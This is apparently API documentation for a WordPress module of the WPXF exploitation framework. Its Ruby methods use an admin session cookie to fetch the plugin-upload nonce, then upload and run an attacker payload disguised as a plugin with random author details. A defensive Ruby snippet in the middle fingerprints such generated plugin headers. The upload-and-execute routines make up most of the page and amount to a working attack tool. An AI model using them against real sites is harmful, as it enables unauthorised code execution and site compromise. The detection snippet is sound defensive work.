Module: Wpxf::WordPress::Plugin

Overview

Provides functionality required to interact with the plugin system.

Instance Method Details

#fetch_plugin_upload_nonce(cookie) ⇒ String?

Retrieve a valid nonce to use for plugin uploads.

Parameters:

  • cookie (String)

    a valid admin session cookie.

Returns:

  • (String, nil)

    the nonce, nil on error.



# File 'lib/wpxf/wordpress/plugin.rb', line 8

def fetch_plugin_upload_nonce(cookie)
  res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
  return nil unless res&.code == 200
  res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
end

#generate_wordpress_plugin_header(plugin_name) ⇒ String

Generate a valid WordPress plugin header / base file.

Parameters:

  • plugin_name (String)

    the name of the plugin.

Returns:

  • (String)

    a PHP script with the appropriate metadata.



# File 'lib/wpxf/wordpress/plugin.rb', line 60

def generate_wordpress_plugin_header(plugin_name)
  ['<?php',
   '/**',
   "* Plugin Name: #{plugin_name}",
   "* Version: #{_generate_wordpress_plugin_version}",
   "* Author: #{Wpxf::Utility::Text.rand_alpha(10)}",
   "* Author URI: http://#{Wpxf::Utility::Text.rand_alpha(10)}.com",
   '* License: GPL2',
   '*/',
   '?>'].join("\n")
end
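
A defender-side check for the header layout generated above, as an added example that is not part of WPXF or this page: it parses a plugin base file and reports which traits it shares with that layout. It assumes rand_alpha(10) returns exactly ten ASCII letters; the method names, indicator symbols and both sample files are constructed for illustration.

```ruby
# Added example (not WPXF code): fingerprint plugin base files shaped like the
# output of generate_wordpress_plugin_header.
# Assumption: rand_alpha(10) returns exactly ten ASCII letters.
EXPECTED_FIELDS = ['Author', 'Author URI', 'License', 'Plugin Name', 'Version'].freeze
HEADER_FIELD = /^\s*\*\s*([A-Za-z ]+?):\s*(.*?)\s*$/

# Parse the "* Key: value" lines of the first docblock into a Hash.
def parse_plugin_header(php_source)
  block = php_source[%r{/\*\*(.*?)\*/}m, 1]
  return {} if block.nil?

  block.each_line.with_object({}) do |line, fields|
    match = HEADER_FIELD.match(line)
    fields[match[1]] = match[2] if match
  end
end

# List every trait the file shares with the generated header layout.
def generated_header_indicators(php_source)
  fields = parse_plugin_header(php_source)
  reasons = []
  reasons << :author_ten_letters if fields['Author'].to_s.match?(/\A[A-Za-z]{10}\z/)
  reasons << :author_uri_ten_letters if fields['Author URI'].to_s.match?(%r{\Ahttp://[A-Za-z]{10}\.com\z})
  reasons << :exact_field_set if fields.keys.sort == EXPECTED_FIELDS
  reasons << :header_only_file if php_source.strip.match?(%r{\A<\?php\s*/\*\*.*?\*/\s*\?>\z}m)
  reasons
end

# One trait alone is weak (a real vendor name can be ten letters), so require all four.
def generated_header?(php_source)
  generated_header_indicators(php_source).length == 4
end

# Constructed samples, not taken from any real site.
GENERATED_STYLE = ['<?php', '/**', '* Plugin Name: kdjfhgur', '* Version: 1.2.3',
                   '* Author: qWerTyuIop', '* Author URI: http://ZxcvBnmAsd.com',
                   '* License: GPL2', '*/', '?>'].join("\n")
BENIGN_STYLE = ['<?php', '/**', ' * Plugin Name: Sample Gallery',
                ' * Description: Constructed benign example.', ' * Version: 2.0',
                ' * Author: Automattic', ' * Author URI: https://automattic.com',
                ' * License: GPL2', ' */', "add_action('init', 'sample_gallery_init');"].join("\n")

# Scan any plugin base files passed on the command line.
if __FILE__ == $PROGRAM_NAME
  ARGV.each { |path| puts "#{path}: #{generated_header_indicators(File.read(path)).join(', ')}" }
end
```

A full match is a lead for review rather than proof, since every field value in the header is easy to change.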

#upload_payload_as_plugin(name, payload_name, cookie) ⇒ Boolean

Create and upload a plugin that encapsulates the current payload.

Parameters:

  • name (String)

    the name of the plugin.

  • payload_name (String)

    the name the payload should use on the server.

  • cookie (String)

    a valid admin session cookie.

Returns:

  • (Boolean)

    true on success, false on error.



# File 'lib/wpxf/wordpress/plugin.rb', line 19

def upload_payload_as_plugin(name, payload_name, cookie)
  nonce = fetch_plugin_upload_nonce(cookie)
  return false if nonce.nil?

  res = _upload_plugin(name, payload_name, cookie, nonce)
  res&.code == 200 && res.body !~ /plugin installation failed/i
end

#upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie) ⇒ HttpResponse?

Upload and execute a payload as a plugin.

Parameters:

  • plugin_name (String)

    the name of the plugin.

  • payload_name (String)

    the name the payload should use on the server.

  • cookie (String)

    a valid admin session cookie.

Returns:



# File 'lib/wpxf/wordpress/plugin.rb', line 44

def upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)
  uploaded_as_plugin = upload_payload_as_plugin(plugin_name, payload_name, cookie)

  unless uploaded_as_plugin
    unless upload_payload_using_plugin_form(payload_name, cookie)
      emit_error 'Failed to upload the payload'
      return nil
    end
  end

  _execute_payload_uploaded_as_plugin(uploaded_as_plugin ? plugin_name : nil, payload_name)
end

#upload_payload_using_plugin_form(payload_name, cookie) ⇒ Boolean

Upload the payload via the plugin form without packaging it in a ZIP file.

Parameters:

  • payload_name (String)

    the name the payload should use on the server.

  • cookie (String)

    a valid admin session cookie.

Returns:

  • (Boolean)

    true on success, false on error.



# File 'lib/wpxf/wordpress/plugin.rb', line 31

def upload_payload_using_plugin_form(payload_name, cookie)
  nonce = fetch_plugin_upload_nonce(cookie)
  return false if nonce.nil?

  res = _upload_plugin(nil, payload_name, cookie, nonce, false)
  res&.code == 200
end